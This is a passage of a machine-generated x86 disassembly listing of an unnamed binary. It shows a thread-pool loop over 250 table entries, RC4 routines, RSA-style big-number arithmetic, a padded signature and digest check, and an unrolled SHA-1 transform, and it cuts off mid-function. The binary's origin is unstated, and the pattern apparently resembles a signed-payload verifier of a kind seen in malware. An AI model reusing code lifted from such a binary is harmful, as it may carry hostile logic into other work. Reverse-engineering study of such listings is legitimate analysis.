mov ecx, 0FAh
idiv ecx
xor eax, eax
cmp esi, ebx
mov edi, edx
jle short loc_9A9A10
loc_9A9A04: ; CODE XREF: sub_9A991B+F3�j
cmp [ebp+eax*4+var_6C], edi
jz short loc_9A99EE
inc eax
cmp eax, [ebp+var_4]
jl short loc_9A9A04
loc_9A9A10: ; CODE XREF: sub_9A991B+E7�j
mov eax, [ebp+edi*4+var_454]
cmp byte ptr [eax], 0
jz short loc_9A99EE
lea ecx, [ebp+var_1C]
push ecx
push ebx
push eax
push offset sub_9A9818
push ebx
push ebx
call dword_9A10EC ; CreateThread
inc [ebp+var_4]
mov [ebp+esi+var_44], eax
mov [ebp+esi+var_6C], edi
add esi, 4
cmp esi, 28h
jb short loc_9A99EE
push 1D4C0h
push 1
lea eax, [ebp+var_44]
push eax
push 0Ah
call dword_9A1038 ; WaitForMultipleObjects
xor edi, edi
loc_9A9A57: ; CODE XREF: sub_9A991B+155�j
push ebx
lea esi, [ebp+edi*4+var_44]
push dword ptr [esi]
call dword_9A103C ; TerminateThread
push dword ptr [esi]
call dword_9A10E8 ; CloseHandle
inc edi
cmp edi, 0Ah
jb short loc_9A9A57
push 1388h
call dword_9A10C4 ; Sleep
xor eax, eax
loc_9A9A7F: ; CODE XREF: sub_9A991B+176�j
mov ecx, [ebp+eax*4+var_454]
cmp byte ptr [ecx], 0
jnz short loc_9A9A93
inc eax
cmp eax, 0FAh
jb short loc_9A9A7F
loc_9A9A93: ; CODE XREF: sub_9A991B+16E�j
cmp eax, 0FAh
jl short loc_9A9A9D
mov [ebp+var_8], ebx
loc_9A9A9D: ; CODE XREF: sub_9A991B+17D�j
cmp [ebp+var_8], ebx
jnz loc_9A99DB
loc_9A9AA6: ; CODE XREF: sub_9A991B+C8�j
xor esi, esi
loc_9A9AA8: ; CODE XREF: sub_9A991B+1A1�j
push [ebp+esi*4+var_454]
call dword_9A10BC ; GlobalFree
inc esi
cmp esi, 0FAh
jl short loc_9A9AA8
pop edi
pop esi
pop ebx
locret_9A9AC1: ; CODE XREF: sub_9A991B+27�j
leave
retn
sub_9A991B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9AC3 proc near ; CODE XREF: sub_9A9B75+16�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
mov [eax], edx
mov [eax+4], edx
xor ecx, ecx
loc_9A9AD2: ; CODE XREF: sub_9A9AC3+1A�j
mov [eax+ecx*4+8], ecx
inc ecx
cmp ecx, 100h
jl short loc_9A9AD2
push ebx
push esi
push edi
xor esi, esi
mov [ebp+arg_0], edx
loc_9A9AE7: ; CODE XREF: sub_9A9AC3+56�j
mov ecx, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov bl, [esi+ebx]
add bl, dl
lea edi, [eax+ecx*4+8]
mov ecx, [edi]
add bl, cl
movzx edx, bl
mov ebx, [eax+edx*4+8]
inc esi
cmp esi, [ebp+arg_8]
mov [edi], ebx
mov [eax+edx*4+8], ecx
jl short loc_9A9B0F
xor esi, esi
loc_9A9B0F: ; CODE XREF: sub_9A9AC3+48�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 100h
jl short loc_9A9AE7
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9A9AC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9B20 proc near ; CODE XREF: sub_9A9B75+28�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ebx
mov ebx, [eax]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9A9B6C
push esi
loc_9A9B35: ; CODE XREF: sub_9A9B20+49�j
inc bl
movzx ebx, bl
mov edx, [eax+ebx*4+8]
add cl, dl
movzx ecx, cl
lea esi, [eax+ecx*4+8]
mov [ebp+arg_0], ecx
mov ecx, [esi]
mov [eax+ebx*4+8], ecx
add cl, dl
mov [esi], edx
mov esi, [ebp+arg_4]
movzx ecx, cl
mov cl, [eax+ecx*4+8]
add esi, edi
xor [esi], cl
mov ecx, [ebp+arg_0]
inc edi
cmp edi, [ebp+arg_8]
jl short loc_9A9B35
pop esi
loc_9A9B6C: ; CODE XREF: sub_9A9B20+12�j
pop edi
mov [eax], ebx
mov [eax+4], ecx
pop ebx
pop ebp
retn
sub_9A9B20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9B75 proc near ; CODE XREF: sub_9A9E56+8C�p
var_408 = byte ptr -408h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 408h
push [ebp+arg_C]
lea eax, [ebp+var_408]
push [ebp+arg_8]
push eax
call sub_9A9AC3
push [ebp+arg_4]
lea eax, [ebp+var_408]
push [ebp+arg_0]
push eax
call sub_9A9B20
add esp, 18h
leave
retn
sub_9A9B75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9BA7 proc near ; CODE XREF: sub_9A9E56+37�p
; sub_9A9E56+9B�p
var_5C = byte ptr -5Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 5Ch
lea eax, [ebp+var_5C]
push eax
call sub_9AB937
push [ebp+arg_4]
lea eax, [ebp+var_5C]
push [ebp+arg_0]
push eax
call sub_9AB966
lea eax, [ebp+var_5C]
push eax
push [ebp+arg_8]
call sub_9ABA09
add esp, 18h
leave
retn
sub_9A9BA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9BD6 proc near ; CODE XREF: sub_9A9C30+3E�p
; sub_9A9C30+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov ecx, 20h
loc_9A9BE7: ; CODE XREF: sub_9A9BD6+1E�j
mov eax, [esi+ecx*4]
mov ebx, [edi+ecx*4]
cmp eax, ebx
jb short loc_9A9BFA
ja short loc_9A9C01
dec ecx
jns short loc_9A9BE7
xor eax, eax
jmp short loc_9A9C06
; ---------------------------------------------------------------------------
loc_9A9BFA: ; CODE XREF: sub_9A9BD6+19�j
mov eax, 0FFFFFFFFh
jmp short loc_9A9C06
; ---------------------------------------------------------------------------
loc_9A9C01: ; CODE XREF: sub_9A9BD6+1B�j
mov eax, 1
loc_9A9C06: ; CODE XREF: sub_9A9BD6+22�j
; sub_9A9BD6+29�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9A9BD6 endp
; =============== S U B R O U T I N E =======================================
sub_9A9C0B proc near ; CODE XREF: sub_9A9C30+13�p
; sub_9A9CF3+37�p
arg_0 = dword ptr 4
mov eax, 41Fh
push esi
loc_9A9C11: ; CODE XREF: sub_9A9C0B+1F�j
mov esi, [esp+4+arg_0]
mov edx, eax
shr edx, 5
mov edx, [esi+edx*4]
mov ecx, eax
and ecx, 1Fh
shr edx, cl
test dl, 1
jnz short loc_9A9C2E
dec eax
jns short loc_9A9C11
xor eax, eax
loc_9A9C2E: ; CODE XREF: sub_9A9C0B+1C�j
pop esi
retn
sub_9A9C0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9C30 proc near ; CODE XREF: sub_9A9CF3+70�p
; sub_9A9CF3+97�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 84h
push 0
push [ebp+arg_0]
call sub_9B3240 ; memset
push ebx
call sub_9A9C0B
mov edx, eax
add esp, 10h
test edx, edx
jl loc_9A9CF1
push esi
push edi
loc_9A9C57: ; CODE XREF: sub_9A9C30+B9�j
mov edi, [ebp+arg_0]
xor eax, eax
mov ecx, 21h
loc_9A9C61: ; CODE XREF: sub_9A9C30+36�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_9A9C61
push [ebp+arg_8]
push [ebp+arg_0]
call sub_9A9BD6
test eax, eax
pop ecx
pop ecx
jl short loc_9A9C92
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 21h
loc_9A9C86: ; CODE XREF: sub_9A9C30+60�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9A9C86
loc_9A9C92: ; CODE XREF: sub_9A9C30+47�j
mov eax, edx
shr eax, 5
mov eax, [ebx+eax*4]
mov ecx, edx
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9A9CE8
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov ecx, 21h
xor eax, eax
loc_9A9CB2: ; CODE XREF: sub_9A9C30+8C�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9A9CB2
push [ebp+arg_8]
push [ebp+arg_0]
call sub_9A9BD6
test eax, eax
pop ecx
pop ecx
jl short loc_9A9CE8
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 21h
loc_9A9CDC: ; CODE XREF: sub_9A9C30+B6�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9A9CDC
loc_9A9CE8: ; CODE XREF: sub_9A9C30+73�j
; sub_9A9C30+9D�j
dec edx
jns loc_9A9C57
pop edi
pop esi
loc_9A9CF1: ; CODE XREF: sub_9A9C30+1F�j
pop ebp
retn
sub_9A9C30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_9A9CF3 proc near ; CODE XREF: sub_9A9DB4+7D�p
var_110 = byte ptr -110h
var_8C = byte ptr -8Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 110h
push esi
push 80h
lea eax, [edi+4]
push 0
push eax
mov dword ptr [edi], 1
call sub_9B3240 ; memset
mov esi, 84h
push esi
push [ebp+6Ch+arg_0]
lea eax, [ebp+6Ch+var_8C]
push eax
call sub_9B323A ; memcpy
push [ebp+6Ch+arg_4]
call sub_9A9C0B
and [ebp+6Ch+var_4], 0
add esp, 1Ch
test eax, eax
mov [ebp+6Ch+var_8], eax
jl short loc_9A9DAE
push ebx
loc_9A9D3E: ; CODE XREF: sub_9A9CF3+B8�j
mov ecx, [ebp+6Ch+var_4]
mov edx, [ebp+6Ch+arg_4]
mov eax, ecx
shr eax, 5
mov eax, [edx+eax*4]
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9A9D79
push [ebp+6Ch+arg_8]
lea eax, [ebp+6Ch+var_110]
push edi
push eax
lea ebx, [ebp+6Ch+var_8C]
call sub_9A9C30
push esi
lea eax, [ebp+6Ch+var_110]
push eax
push edi
call sub_9B323A ; memcpy
add esp, 18h
loc_9A9D79: ; CODE XREF: sub_9A9CF3+60�j
push [ebp+6Ch+arg_8]
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_110]
push eax
lea ebx, [ebp+6Ch+var_8C]
call sub_9A9C30
push esi
lea eax, [ebp+6Ch+var_110]
push eax
mov eax, ebx
push eax
call sub_9B323A ; memcpy
add esp, 18h
inc [ebp+6Ch+var_4]
mov eax, [ebp+6Ch+var_4]
cmp eax, [ebp+6Ch+var_8]
jle short loc_9A9D3E
pop ebx
loc_9A9DAE: ; CODE XREF: sub_9A9CF3+48�j
pop esi
add ebp, 6Ch
leave
retn
sub_9A9CF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=68h
sub_9A9DB4 proc near ; CODE XREF: sub_9A9E56+49�p
var_210 = byte ptr -210h
var_191 = byte ptr -191h
var_18C = byte ptr -18Ch
var_108 = byte ptr -108h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-68h]
sub esp, 210h
mov eax, [ebp+68h+arg_4]
push esi
push edi
mov esi, 80h
push esi
mov [ebp+68h+var_84], eax
lea eax, [ebp+68h+var_80]
push 0
push eax
call sub_9B3240 ; memset
push 84h
lea eax, [ebp+68h+var_18C]
push 0
push eax
call sub_9B3240 ; memset
push esi
push [ebp+68h+arg_0]
lea eax, [ebp+68h+var_18C]
push eax
call sub_9B323A ; memcpy
mov eax, [ebp+68h+arg_C]
and [ebp+68h+var_88], 0
add esp, 24h
xor ecx, ecx
add eax, 7Fh
loc_9A9E0A: ; CODE XREF: sub_9A9DB4+63�j
mov dl, [eax]
mov [ebp+ecx+68h+var_108], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9A9E0A
lea eax, [ebp+68h+var_18C]
push eax
lea eax, [ebp+68h+var_84]
push eax
lea eax, [ebp+68h+var_108]
push eax
lea edi, [ebp+68h+var_210]
call sub_9A9CF3
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+68h+var_191]
loc_9A9E41: ; CODE XREF: sub_9A9DB4+99�j
mov dl, [eax]
mov edi, [ebp+68h+arg_8]
mov [ecx+edi], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9A9E41
pop edi
pop esi
add ebp, 68h
leave
retn
sub_9A9DB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9E56 proc near ; CODE XREF: sub_9A9312+3B�p
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_94 = byte ptr -94h
var_80 = byte ptr -80h
var_28 = byte ptr -28h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 100h
push 7Eh
lea eax, [ebp+var_FE]
push 0FFh
push eax
mov [ebp+var_100], 0
mov [ebp+var_FF], 1
call sub_9B3240 ; memset
lea eax, [ebp+var_94]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9A9BA7
push [ebp+arg_8]
lea eax, [ebp+var_80]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_9A9DB4
push 58h
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+var_100]
push eax
call sub_9B333C ; memcmp
add esp, 34h
test eax, eax
jnz short loc_9A9F0F
push 14h
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_94]
push eax
call sub_9B333C ; memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A9F0F
push 14h
lea eax, [ebp+var_28]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9A9B75
lea eax, [ebp+var_14]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9A9BA7
push 14h
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_28]
push eax
call sub_9B333C ; memcmp
add esp, 28h
neg eax
sbb eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9A9F0F: ; CODE XREF: sub_9A9E56+65�j
; sub_9A9E56+7E�j
xor al, al
leave
retn
sub_9A9E56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9F13 proc near ; CODE XREF: sub_9AB966+51�p
; sub_9AB966+6F�p ...
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_54]
push eax
call sub_9B323A ; memcpy
mov edi, [ebp+var_54]
mov edx, [ebp+arg_0]
mov esi, edi
shl esi, 18h
mov eax, edi
mov ebx, edi
shr eax, 8
or esi, eax
shr edi, 18h
mov eax, 0FF00h
and ebx, eax
shl ebx, 8
mov ecx, 0FF00FF00h
and esi, ecx
or esi, ebx
or esi, edi
mov [ebp+var_54], esi
mov esi, [edx]
mov edi, esi
shl esi, 5
shr edi, 1Bh
or edi, esi
mov esi, [edx+0Ch]
xor esi, [edx+8]
add edi, [edx+10h]
and esi, [edx+4]
mov ebx, [ebp+var_50]
xor esi, [edx+0Ch]
shr ebx, 8
add esi, edi
mov edi, [ebp+var_54]
lea esi, [esi+edi+5A827999h]
mov [ebp+arg_0], esi
mov esi, [edx+4]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_50]
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_50]
and ebx, eax
and esi, ecx
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_50]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+arg_0]
mov [ebp+var_50], esi
mov esi, [ebp+arg_0]
shr esi, 1Bh
shl ebx, 5
or esi, ebx
mov ebx, [edx+8]
add esi, [ebp+var_50]
xor ebx, edi
and ebx, [edx]
mov [ebp+var_8], edi
xor ebx, [edx+8]
add esp, 0Ch
add ebx, esi
mov esi, [edx+0Ch]
lea esi, [esi+ebx+5A827999h]
mov [ebp+var_10], esi
mov esi, [edx]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_4C]
mov [ebp+var_4], edi
mov ebx, [ebp+var_4C]
shl esi, 18h
shr ebx, 8
or esi, ebx
mov ebx, [ebp+var_4C]
and esi, ecx
and ebx, eax
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_4C]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_10]
mov [ebp+var_4C], esi
mov esi, [ebp+var_10]
shr esi, 1Bh
shl ebx, 5
or esi, ebx
add esi, [ebp+var_4C]
mov ebx, [ebp+var_8]
xor ebx, edi
and ebx, [ebp+arg_0]
xor ebx, [ebp+var_8]
add ebx, esi
mov esi, [edx+8]
lea esi, [esi+ebx+5A827999h]
mov ebx, [ebp+var_48]
mov [ebp+var_C], esi
mov esi, [ebp+arg_0]
mov edi, esi
shr esi, 2
shr ebx, 8
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_48]
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_48]
and esi, ecx
and ebx, eax
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_48]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_C]
mov [ebp+var_48], esi
mov esi, [ebp+var_C]
shr esi, 1Bh
mov [ebp+arg_0], edi
xor edi, [ebp+var_4]
shl ebx, 5
and edi, [ebp+var_10]
or esi, ebx
add esi, [ebp+var_48]
xor edi, [ebp+var_4]
mov ebx, [ebp+var_44]
add edi, esi
mov esi, [ebp+var_8]
lea esi, [esi+edi+5A827999h]
mov [ebp+var_8], esi
mov esi, [ebp+var_10]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_44]
shr ebx, 8
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_44]
and ebx, eax
shl ebx, 8
and esi, ecx
or esi, ebx
mov ebx, [ebp+var_44]
shr ebx, 18h
or esi, ebx
mov [ebp+var_44], esi
mov esi, [ebp+var_8]
mov [ebp+var_10], edi
mov ebx, [ebp+var_8]
shl ebx, 5
shr esi, 1Bh
or esi, ebx
add esi, [ebp+var_44]
mov ebx, [ebp+arg_0]
xor ebx, edi
and ebx, [ebp+var_C]
xor ebx, [ebp+arg_0]
add ebx, esi
mov esi, [ebp+var_4]
lea esi, [esi+ebx+5A827999h]
mov [ebp+var_4], esi
mov esi, [ebp+var_C]
mov ebx, [ebp+var_40]
mov edi, esi
shr esi, 2
shr ebx, 8
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_40]
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_40]
and ebx, eax
shl ebx, 8
and esi, ecx
or esi, ebx
mov ebx, [ebp+var_40]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_4]
mov [ebp+var_40], esi
mov esi, [ebp+var_4]
shl ebx, 5
shr esi, 1Bh
or esi, ebx
add esi, [ebp+var_40]
mov ebx, [ebp+var_10]
xor ebx, edi
and ebx, [ebp+var_8]
mov [ebp+var_C], edi
xor ebx, [ebp+var_10]
add ebx, esi
mov esi, [ebp+arg_0]
lea esi, [esi+ebx+5A827999h]
mov ebx, [ebp+var_3C]
mov [ebp+arg_0], esi
mov esi, [ebp+var_8]
mov edi, esi
shr esi, 2
shr ebx, 8
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_3C]
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_3C]
and ebx, eax
shl ebx, 8
and esi, ecx
or esi, ebx
mov ebx, [ebp+var_3C]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+arg_0]
mov [ebp+var_3C], esi
mov esi, [ebp+arg_0]
shl ebx, 5
shr esi, 1Bh
or esi, ebx
mov ebx, [ebp+var_C]
add esi, [ebp+var_3C]
xor ebx, edi
and ebx, [ebp+var_4]
mov [ebp+var_8], edi
xor ebx, [ebp+var_C]
add ebx, esi
mov esi, [ebp+var_10]
lea esi, [esi+ebx+5A827999h]
mov [ebp+var_10], esi
mov esi, [ebp+var_4]
mov edi, esi
shr esi, 2
mov ebx, [ebp+var_38]
shr ebx, 8
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_38]
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_38]
and esi, ecx
and ebx, eax
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_38]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_10]
mov [ebp+var_38], esi
mov esi, [ebp+var_10]
shr esi, 1Bh
shl ebx, 5
or esi, ebx
add esi, [ebp+var_38]
mov ebx, [ebp+var_8]
xor ebx, edi
and ebx, [ebp+arg_0]
mov [ebp+var_4], edi
xor ebx, [ebp+var_8]
add ebx, esi
mov esi, [ebp+var_C]
lea esi, [esi+ebx+5A827999h]
mov ebx, [ebp+var_34]
mov [ebp+var_C], esi
mov esi, [ebp+arg_0]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_34]
shl esi, 18h
shr ebx, 8
or esi, ebx
mov ebx, [ebp+var_34]
and esi, ecx
and ebx, eax
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_34]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_C]
mov [ebp+var_34], esi
mov esi, [ebp+var_C]
shr esi, 1Bh
mov [ebp+arg_0], edi
xor edi, [ebp+var_4]
shl ebx, 5
and edi, [ebp+var_10]
or esi, ebx
add esi, [ebp+var_34]
xor edi, [ebp+var_4]
mov ebx, [ebp+var_30]
add edi, esi
mov esi, [ebp+var_8]
lea esi, [esi+edi+5A827999h]
mov [ebp+var_8], esi
mov esi, [ebp+var_10]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_30]
shl esi, 18h
shr ebx, 8
or esi, ebx
mov ebx, [ebp+var_30]
and esi, ecx
mov [ebp+var_10], edi
and ebx, eax
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_30]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_8]
mov [ebp+var_30], esi
mov esi, [ebp+var_8]
shl ebx, 5
shr esi, 1Bh
or esi, ebx
add esi, [ebp+var_30]
mov ebx, [ebp+arg_0]
xor ebx, edi
and ebx, [ebp+var_C]
xor ebx, [ebp+arg_0]
add ebx, esi
mov esi, [ebp+var_4]
lea esi, [esi+ebx+5A827999h]
mov [ebp+var_4], esi
mov esi, [ebp+var_C]
mov ebx, [ebp+var_2C]
mov edi, esi
shr esi, 2
shr ebx, 8
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_2C]
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_2C]
and ebx, eax
shl ebx, 8
and esi, ecx
or esi, ebx
mov ebx, [ebp+var_2C]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_4]
mov [ebp+var_2C], esi
mov esi, [ebp+var_4]
shl ebx, 5
shr esi, 1Bh
or esi, ebx
add esi, [ebp+var_2C]
mov ebx, [ebp+var_10]
xor ebx, edi
and ebx, [ebp+var_8]
mov [ebp+var_C], edi
xor ebx, [ebp+var_10]
add ebx, esi
mov esi, [ebp+arg_0]
lea esi, [esi+ebx+5A827999h]
mov ebx, [ebp+var_28]
mov [ebp+arg_0], esi
mov esi, [ebp+var_8]
mov edi, esi
shr esi, 2
shr ebx, 8
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_28]
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_28]
and ebx, eax
shl ebx, 8
and esi, ecx
or esi, ebx
mov ebx, [ebp+var_28]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+arg_0]
mov [ebp+var_28], esi
mov esi, [ebp+arg_0]
shl ebx, 5
shr esi, 1Bh
or esi, ebx
mov ebx, [ebp+var_C]
mov [ebp+var_8], edi
xor ebx, edi
add esi, [ebp+var_28]
and ebx, [ebp+var_4]
xor ebx, [ebp+var_C]
add ebx, esi
mov esi, [ebp+var_10]
lea esi, [esi+ebx+5A827999h]
mov [ebp+var_10], esi
mov esi, [ebp+var_4]
mov edi, esi
shr esi, 2
mov ebx, [ebp+var_24]
shr ebx, 8
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_24]
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_24]
and esi, ecx
and ebx, eax
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_24]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_10]
mov [ebp+var_24], esi
mov esi, [ebp+var_10]
shr esi, 1Bh
shl ebx, 5
or esi, ebx
add esi, [ebp+var_24]
mov ebx, [ebp+var_8]
xor ebx, edi
and ebx, [ebp+arg_0]
mov [ebp+var_4], edi
xor ebx, [ebp+var_8]
add ebx, esi
mov esi, [ebp+var_C]
lea esi, [esi+ebx+5A827999h]
mov ebx, [ebp+var_20]
mov [ebp+var_C], esi
mov esi, [ebp+arg_0]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_20]
shl esi, 18h
shr ebx, 8
or esi, ebx
mov ebx, [ebp+var_20]
and esi, ecx
and ebx, eax
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_20]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_C]
mov [ebp+var_20], esi
mov esi, [ebp+var_C]
mov [ebp+arg_0], edi
xor edi, [ebp+var_4]
shr esi, 1Bh
and edi, [ebp+var_10]
shl ebx, 5
xor edi, [ebp+var_4]
or esi, ebx
add esi, [ebp+var_20]
add edi, esi
mov esi, [ebp+var_8]
lea esi, [esi+edi+5A827999h]
mov [ebp+var_8], esi
mov esi, [ebp+var_10]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_1C]
mov [ebp+var_10], edi
mov ebx, [ebp+var_1C]
shr ebx, 8
shl esi, 18h
or esi, ebx
mov ebx, [ebp+var_1C]
and ebx, eax
and esi, ecx
shl ebx, 8
or esi, ebx
mov ebx, [ebp+var_1C]
shr ebx, 18h
or esi, ebx
mov ebx, [ebp+var_8]
shl ebx, 5
mov [ebp+var_1C], esi
mov esi, [ebp+var_8]
shr esi, 1Bh
or esi, ebx
add esi, [ebp+var_1C]
mov ebx, [ebp+arg_0]
xor ebx, edi
and ebx, [ebp+var_C]
xor ebx, [ebp+arg_0]
add ebx, esi
mov esi, [ebp+var_4]
lea edi, [esi+ebx+5A827999h]
mov ebx, [ebp+var_C]
mov esi, ebx
shr ebx, 2
shl esi, 1Eh
or esi, ebx
mov ebx, [ebp+var_18]
mov [ebp+var_C], esi
mov esi, [ebp+var_18]
shr ebx, 8
shl esi, 18h
or esi, ebx
and esi, ecx
mov ecx, [ebp+var_18]
mov ebx, ecx
and ebx, eax
shr ecx, 18h
shl ebx, 8
or esi, ebx
or esi, ecx
mov eax, edi
shr eax, 1Bh
mov ecx, edi
shl ecx, 5
or eax, ecx
mov ecx, [ebp+var_10]
xor ecx, [ebp+var_C]
add eax, esi
and ecx, [ebp+var_8]
xor ecx, [ebp+var_10]
add ecx, eax
mov eax, [ebp+arg_0]
lea eax, [eax+ecx+5A827999h]
mov [ebp+arg_0], eax
mov eax, [ebp+var_8]
mov ecx, eax
shr eax, 2
shl ecx, 1Eh
or ecx, eax
mov eax, [ebp+var_20]
xor eax, [ebp+var_34]
mov [ebp+var_8], ecx
xor eax, [ebp+var_4C]
xor eax, [ebp+var_54]
mov ebx, eax
shr ebx, 1Fh
add eax, eax
or ebx, eax
mov eax, [ebp+arg_0]
mov [ebp+var_54], ebx
mov ebx, [ebp+arg_0]
shl ebx, 5
shr eax, 1Bh
or eax, ebx
mov ebx, [ebp+var_C]
xor ebx, ecx
and ebx, edi
xor ebx, [ebp+var_C]
add eax, [ebp+var_54]
add ebx, eax
mov eax, [ebp+var_10]
lea eax, [eax+ebx+5A827999h]
mov ebx, edi
shr edi, 2
mov [ebp+var_10], eax
mov eax, [ebp+var_1C]
